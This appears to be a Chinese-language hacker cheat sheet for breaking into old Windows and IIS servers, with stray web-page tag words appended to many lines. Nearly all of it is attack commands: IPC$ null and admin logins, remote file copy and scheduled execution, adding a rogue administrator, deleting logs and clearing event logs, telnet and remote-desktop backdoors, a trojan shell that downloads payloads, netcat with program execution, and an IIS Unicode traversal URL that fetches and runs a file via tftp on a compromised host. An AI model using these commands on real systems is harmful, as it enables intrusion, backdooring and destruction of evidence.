查看對方IP或者計算機名
經常使用的幾條NET命令: ios
==================================================shell
1. 知道對方ip查看對方的計算機名
方法:開始->運行->cmd->net view 對方ip
或者 開始->運行->cmd->nbtstat -a 對方ip瀏覽器
2. 知道對方計算機名查看對方ip
方法:開始->運行->cmd->ping 對方計算機名
或者 開始->運行->cmd->nbtstat -a 對方計算機名安全
(與遠程主機創建空管鏈接) net use \\IP地址\ipc$ " " /use:" " 服務器
(以管理員身份登陸遠程主機) net use \\IP地址\ipc$ " 密碼" /use:" Administrator" 併發
(傳送文件到遠程主機WINNT目錄下)copy 本機目錄路徑\程序 \\IP地址\admin$ app
(查看遠程主機時間) net time \\IP地址 ide
(定時啓動某個程序) at \\IP地址 02:18 readme.exe 工具
(查看共享) net view \\IP地址 網站
(查看netbios工做組列表) nbtstat -A IP地址
(將遠程主機C盤映射爲本身的F盤) net use f: \\IP地址\c$ " " /user:" Administrator"
(這兩條把本身增長到管理員組): net user 用戶名 密碼 /add
net localgroup Administrators 用戶名 /add
(斷開鏈接) net use \\IP地址\ipc$ /delete
=====================================================
擦屁屁:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\system32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
============================
1、netsvc.exe
下面的命令分別是列出主機上的服務項目、查尋和遠程啓動主機的「 時間任務」 服務:
netsvc /list \\IP地址
netsvc schedule \\IP地址 /query
netsvc \\IP地址 schedule /start
2、OpenTelnet.exe
遠程啓動主機的Telnet服務,並綁定端口到7878,例如:
OpenTelnet \\IP地址 用戶名 密碼 1 7878
而後就能夠telnet到主機的7878端口,進入DOS方式下:
telnet IP地址 7878
3、winshell.exe
一個很是小的***(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD> 後,可打下面的命令:
p Path (查看winshell主程序的路徑信息)
b reBoot (從新啓動機器)
d shutDown (關閉機器)
s Shell (執行後你就會看到可愛的「 C:\> 」 )
x eXit (退出本次登陸會話,此命令並不終止winshell的運行)
CMD> http://.../srv.exe (經過http下載其餘網站上的文件到運行winshell的機器上)
4、3389登錄器,GUI方式登陸遠程主機的
5、elsave.exe
事件日誌清除工具
elsave -s \\IP地址 -l " application" -C
elsave -s \\IP地址 -l " system" -C
elsave -s \\IP地址 -l " security" -C
執行後成功清除應用程序日誌,系統日誌,安全日誌
6、hbulot.exe
開啓win2kserver和winxp的3389服務
hbulot [/r]
使用/r表示安裝完成後自動重起目標使設置生效。
7、nc.exe(netcat.exe)
一個很好的工具,一些腳本程序都要用到它,也可作溢出後的鏈接用。
想要鏈接到某處: nc [-options] hostname port[s] [ports] ...
綁定端口等待鏈接: nc -l -p port [-options] [hostname] [port]
參數:
-e prog 程序重定向,一旦鏈接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用於入站鏈接
-n 指定數字的IP地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 任意指定本地及遠程端口
-s addr 本地源地址
-u UDP模式
-v 詳細輸出— — 用兩個-v可獲得更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉— — 用於掃描時
8、TFTPD32.EXE
把本身的電腦臨時變爲一臺FTP服務器,讓肉雞來下載文件,tftp命令要在肉雞上執行,一般要利用Unicode漏洞或telnet到肉雞,例如:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 文件名 c:\winnt\system32\文件名
而後能夠直接令文件運行:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
9、prihack.exe是IIS的printer遠程緩衝區溢出工具。idqover.exe是溢出idq的,選擇「 溢出後在一個端口監聽」 ,而後用telnet鏈接它的監聽端口,若是溢出成功,一連它的端口,綁定的命令立刻執行。xploit.exe是一個圖形界面的ida溢出,成功之後winxp下須要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行權限的目錄。而後用IE瀏覽器鏈接。
1、一 Xscan命令行運行參數說明:
在檢測過程當中,按" [空格]" 鍵能夠查看各線程狀態及掃描進度,按" q" 鍵保存當前數據後提早退出程序,按" " 強行關閉程序。
1.命令格式: xscan -host [-] [其餘選項]
xscan -file [其餘選項]
其中 含義以下:
-port : 檢測經常使用服務的端口狀態(可經過\dat\config.ini文件的" PORT-SCAN-OPTIONS\PORT-LIST" 項定製待檢測端口列表);
-ftp : 檢測FTP弱口令(可經過\dat\config.ini文件設置用戶名/密碼字典文件);
-ntpass : 檢測NT-Server弱口令(可經過\dat\config.ini文件設置用戶名/密碼字典文件);
-cgi : 檢測CGI漏洞(可經過\dat\config.ini文件的" CGI-ENCODE\encode_type" 項設置編碼方案);
-iis : 檢測IIS漏洞(可經過\dat\config.ini文件的" CGI-ENCODE\encode_type" 項設置編碼方案);
[其餘選項] 含義以下:
-v: 顯示詳細掃描進度
-p: 跳過Ping不通的主機
-o: 跳過沒有檢測到開放端口的主機
-t : 指定最大併發線程數量和併發主機數量, 默認數量爲100,10